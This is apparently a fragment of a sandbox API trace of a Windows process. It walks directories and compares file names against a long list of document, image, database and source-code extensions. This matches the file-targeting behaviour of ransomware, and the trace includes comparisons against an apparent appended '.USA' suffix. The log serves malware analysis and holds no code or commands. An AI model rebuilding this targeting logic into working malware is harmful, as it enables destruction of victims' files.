4 [0034.639] lstrcmpiW (lpString1=".p7c", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".pam") returned 4 [0034.639] lstrcmpiW (lpString1=".pam", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".pbm") returned 4 [0034.639] lstrcmpiW (lpString1=".pbm", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".pct") returned 4 [0034.639] lstrcmpiW (lpString1=".pct", lpString2=".USA") returned -1 [0034.639] lstrlenW (lpString=".pcx") returned 4 [0034.639] lstrcmpiW (lpString1=".pcx", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pdd") returned 4 [0034.640] lstrcmpiW (lpString1=".pdd", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pdf") returned 4 [0034.640] lstrcmpiW (lpString1=".pdf", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pdp") returned 4 [0034.640] lstrcmpiW (lpString1=".pdp", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pef") returned 4 [0034.640] lstrcmpiW (lpString1=".pef", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pem") returned 4 [0034.640] lstrcmpiW (lpString1=".pem", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pff") returned 4 [0034.640] lstrcmpiW (lpString1=".pff", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pfm") returned 4 [0034.640] lstrcmpiW (lpString1=".pfm", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pfx") returned 4 [0034.640] lstrcmpiW (lpString1=".pfx", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pgm") returned 4 [0034.640] lstrcmpiW (lpString1=".pgm", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".php") returned 4 [0034.640] lstrcmpiW (lpString1=".php", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".php3") returned 5 [0034.640] lstrcmpiW (lpString1=".php3", lpString2="].USA") returned -1 [0034.640] lstrlenW (lpString=".php4") returned 5 [0034.640] lstrcmpiW (lpString1=".php4", lpString2="].USA") returned -1 [0034.640] lstrlenW (lpString=".php5") returned 5 [0034.640] lstrcmpiW (lpString1=".php5", lpString2="].USA") returned -1 [0034.640] lstrlenW (lpString=".phtml") returned 6 [0034.640] lstrcmpiW (lpString1=".phtml", lpString2="m].USA") returned -1 [0034.640] lstrlenW (lpString=".pict") returned 5 [0034.640] lstrcmpiW (lpString1=".pict", lpString2="].USA") returned -1 [0034.640] lstrlenW (lpString=".pl") returned 3 [0034.640] lstrcmpiW (lpString1=".pl", lpString2="USA") returned -1 [0034.640] lstrlenW (lpString=".pls") returned 4 [0034.640] lstrcmpiW (lpString1=".pls", lpString2=".USA") returned -1 [0034.640] lstrlenW (lpString=".pm") returned 3 [0034.641] lstrcmpiW (lpString1=".pm", lpString2="USA") returned -1 [0034.641] lstrlenW (lpString=".png") returned 4 [0034.641] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".pnm") returned 4 [0034.641] lstrcmpiW (lpString1=".pnm", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".pot") returned 4 [0034.641] lstrcmpiW (lpString1=".pot", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".potm") returned 5 [0034.641] lstrcmpiW (lpString1=".potm", lpString2="].USA") returned -1 [0034.641] lstrlenW (lpString=".potx") returned 5 [0034.641] lstrcmpiW (lpString1=".potx", lpString2="].USA") returned -1 [0034.641] lstrlenW (lpString=".ppa") returned 4 [0034.641] lstrcmpiW (lpString1=".ppa", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".ppam") returned 5 [0034.641] lstrcmpiW (lpString1=".ppam", lpString2="].USA") returned -1 [0034.641] lstrlenW (lpString=".ppm") returned 4 [0034.641] lstrcmpiW (lpString1=".ppm", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".pps") returned 4 [0034.641] lstrcmpiW (lpString1=".pps", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".ppsm") returned 5 [0034.641] lstrcmpiW (lpString1=".ppsm", lpString2="].USA") returned -1 [0034.641] lstrlenW (lpString=".ppt") returned 4 [0034.641] lstrcmpiW (lpString1=".ppt", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".pptm") returned 5 [0034.641] lstrcmpiW (lpString1=".pptm", lpString2="].USA") returned -1 [0034.641] lstrlenW (lpString=".pptx") returned 5 [0034.641] lstrcmpiW (lpString1=".pptx", lpString2="].USA") returned -1 [0034.641] lstrlenW (lpString=".prn") returned 4 [0034.641] lstrcmpiW (lpString1=".prn", lpString2=".USA") returned -1 [0034.641] lstrlenW (lpString=".ps") returned 3 [0034.641] lstrcmpiW (lpString1=".ps", lpString2="USA") returned -1 [0034.641] lstrlenW (lpString=".psb") returned 4 [0034.641] lstrcmpiW (lpString1=".psb", lpString2=".USA") returned -1 [0034.642] lstrlenW (lpString=".psd") returned 4 [0034.642] lstrcmpiW (lpString1=".psd", lpString2=".USA") returned -1 [0034.642] lstrlenW (lpString=".pst") returned 4 [0034.642] lstrcmpiW (lpString1=".pst", lpString2=".USA") returned -1 [0034.642] lstrlenW (lpString=".ptx") returned 4 [0034.642] lstrcmpiW (lpString1=".ptx", lpString2=".USA") returned -1 [0034.642] lstrlenW (lpString=".pub") returned 4 [0034.642] lstrcmpiW (lpString1=".pub", lpString2=".USA") returned -1 [0034.642] lstrlenW (lpString=".pwm") returned 4 [0034.642] lstrcmpiW (lpString1=".pwm", lpString2=".USA") returned -1 [0034.688] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf58c | out: lpFindFileData=0x3aaf58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.688] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf58c | out: lpFindFileData=0x3aaf58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0034.688] FindNextFileW (in: hFindFile=0x6c4028, lpFindFileData=0x3aaf58c | out: lpFindFileData=0x3aaf58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0034.688] FindClose (in: hFindFile=0x6c4028 | out: hFindFile=0x6c4028) returned 1 [0034.689] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f20060 | out: hHeap=0x5d0000) returned 1 [0034.689] FindNextFileW (in: hFindFile=0x6c3f68, lpFindFileData=0x3aaf808 | out: lpFindFileData=0x3aaf808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x12dcef70, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x12dcef70, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0034.689] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f20060 [0035.897] FindNextFileW (in: hFindFile=0x6c3fe8, lpFindFileData=0x3aaf310 | out: lpFindFileData=0x3aaf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6cdb800, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6cdb800, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.897] FindNextFileW (in: hFindFile=0x6c3fe8, lpFindFileData=0x3aaf310 | out: lpFindFileData=0x3aaf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0035.897] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f40070 [0035.897] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\*", lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c40e8 [0035.899] FindNextFileW (in: hFindFile=0x6c40e8, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a42070, ftCreationTime.dwHighDateTime=0x1d2dda2, ftLastAccessTime.dwLowDateTime=0xd6d4dc20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd6d4dc20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.899] FindNextFileW (in: hFindFile=0x6c40e8, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0035.899] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3f65090 [0035.899] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\1033\\*", lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4068 [0035.900] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x617be070, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd504b000, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.900] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd5024ea0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x2760, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstallerUI.dll", cAlternateFileName="VSTOIN~1.DLL")) returned 1 [0035.900] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0035.900] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x3aaee18 | out: lpFindFileData=0x3aaee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a612c00, ftCreationTime.dwHighDateTime=0x1cb6585, ftLastAccessTime.dwLowDateTime=0xd504b000, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x6a612c00, ftLastWriteTime.dwHighDateTime=0x1cb6585, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 0 [0035.900] FindClose (in: hFindFile=0x6c4068 | out: hFindFile=0x6c4068) returned 1 [0035.900] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f65090 | out: hHeap=0x5d0000) returned 1 [0035.901] FindNextFileW (in: hFindFile=0x6c40e8, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc251dc00, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x5e4b68d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc251dc00, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="VSTOInstaller.config", cAlternateFileName="VSTOIN~1.CON")) returned 1 [0036.770] FindNextFileW (in: hFindFile=0x6c4128, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa198102e, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa9057bb, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa19a729d, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0036.770] FindNextFileW (in: hFindFile=0x6c4128, lpFindFileData=0x3aaf094 | out: lpFindFileData=0x3aaf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f740a33, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f740a33, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x540920df, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0036.771] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0036.771] lstrcmpiW (lpString1=".accda", lpString2="ck.png") returned -1 [0036.771] lstrcmpiW (lpString1=".accdb", lpString2="ck.png") returned -1 [0036.771] lstrcmpiW (lpString1=".accdc", lpString2="ck.png") returned -1 [0036.771] lstrcmpiW (lpString1=".accde", lpString2="ck.png") returned -1 [0036.771] lstrcmpiW (lpString1=".accdt", lpString2="ck.png") returned -1 [0036.771] lstrcmpiW (lpString1=".accdw", lpString2="ck.png") returned -1 [0036.771] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0036.771] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0036.771] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".anim", lpString2="k.png") returned -1 [0036.772] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0036.772] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".ascx", lpString2="k.png") returned -1 [0036.772] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".asmx", lpString2="k.png") returned -1 [0036.772] lstrcmpiW (lpString1=".asp", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".aspx", lpString2="k.png") returned -1 [0036.772] lstrcmpiW (lpString1=".asr", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".asx", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".avi", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".avs", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".backup", lpString2="ack.png") returned -1 [0036.772] lstrcmpiW (lpString1=".bak", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".bay", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".bd", lpString2="png") returned -1 [0036.772] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".bmp", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0036.772] lstrcmpiW (lpString1=".c", lpString2="ng") returned -1 [0036.772] lstrcmpiW (lpString1=".cdr", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cer", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cf", lpString2="png") returned -1 [0036.773] lstrcmpiW (lpString1=".cfc", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cfm", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cfml", lpString2="k.png") returned -1 [0036.773] lstrcmpiW (lpString1=".cfu", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".chm", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cin", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".class", lpString2="ck.png") returned -1 [0036.773] lstrcmpiW (lpString1=".clx", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".config", lpString2="ack.png") returned -1 [0036.773] lstrcmpiW (lpString1=".cpp", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cr2", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".crt", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".crw", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cs", lpString2="png") returned -1 [0036.773] lstrcmpiW (lpString1=".css", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".csv", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".cub", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".dae", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".dat", lpString2=".png") returned -1 [0036.773] lstrcmpiW (lpString1=".db", lpString2="png") returned -1 [0036.774] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dbx", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dc3", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dcm", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dcr", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".der", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dib", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dic", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dif", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".divx", lpString2="k.png") returned -1 [0036.774] lstrcmpiW (lpString1=".djvu", lpString2="k.png") returned -1 [0036.774] lstrcmpiW (lpString1=".dng", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".docm", lpString2="k.png") returned -1 [0036.774] lstrcmpiW (lpString1=".docx", lpString2="k.png") returned -1 [0036.774] lstrcmpiW (lpString1=".dot", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dotm", lpString2="k.png") returned -1 [0036.774] lstrcmpiW (lpString1=".dotx", lpString2="k.png") returned -1 [0036.774] lstrcmpiW (lpString1=".dpx", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dqy", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dsn", lpString2=".png") returned -1 [0036.774] lstrcmpiW (lpString1=".dt", lpString2="png") returned -1 [0036.774] lstrcmpiW (lpString1=".dtd", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".dwg", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".dwt", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".dx", lpString2="png") returned -1 [0036.775] lstrcmpiW (lpString1=".dxf", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".edml", lpString2="k.png") returned -1 [0036.775] lstrcmpiW (lpString1=".efd", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".elf", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".emf", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".emz", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".epf", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".eps", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".epsf", lpString2="k.png") returned -1 [0036.775] lstrcmpiW (lpString1=".epsp", lpString2="k.png") returned -1 [0036.775] lstrcmpiW (lpString1=".erf", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".exr", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".f4v", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".fido", lpString2="k.png") returned -1 [0036.775] lstrcmpiW (lpString1=".flm", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".flv", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".fxg", lpString2=".png") returned -1 [0036.775] lstrcmpiW (lpString1=".geo", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".gif", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".grs", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".gz", lpString2="png") returned -1 [0036.776] lstrcmpiW (lpString1=".h", lpString2="ng") returned -1 [0036.776] lstrcmpiW (lpString1=".hdr", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".hpp", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".htc", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".htm", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".html", lpString2="k.png") returned -1 [0036.776] lstrcmpiW (lpString1=".icb", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".iff", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".inc", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".indd", lpString2="k.png") returned -1 [0036.776] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".iqy", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".j2c", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".j2k", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".java", lpString2="k.png") returned -1 [0036.776] lstrcmpiW (lpString1=".jp2", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".jpc", lpString2=".png") returned -1 [0036.776] lstrcmpiW (lpString1=".jpe", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".jpeg", lpString2="k.png") returned -1 [0036.777] lstrcmpiW (lpString1=".jpf", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".jpx", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".js", lpString2="png") returned -1 [0036.777] lstrcmpiW (lpString1=".jsf", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".json", lpString2="k.png") returned -1 [0036.777] lstrcmpiW (lpString1=".jsp", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".kdc", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".kmz", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".kwm", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".lasso", lpString2="ck.png") returned -1 [0036.777] lstrcmpiW (lpString1=".lbi", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".lgf", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".lgp", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".log", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".m1v", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".m4a", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".m4v", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".max", lpString2=".png") returned -1 [0036.777] lstrcmpiW (lpString1=".md", lpString2="png") returned -1 [0036.777] lstrcmpiW (lpString1=".mda", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mdb", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mde", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mdw", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mef", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mft", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mfw", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mht", lpString2=".png") returned -1 [0036.778] lstrcmpiW (lpString1=".mhtml", lpString2="ck.png") returned -1 [0036.778] lstrcmpiW (lpString1=".mka", 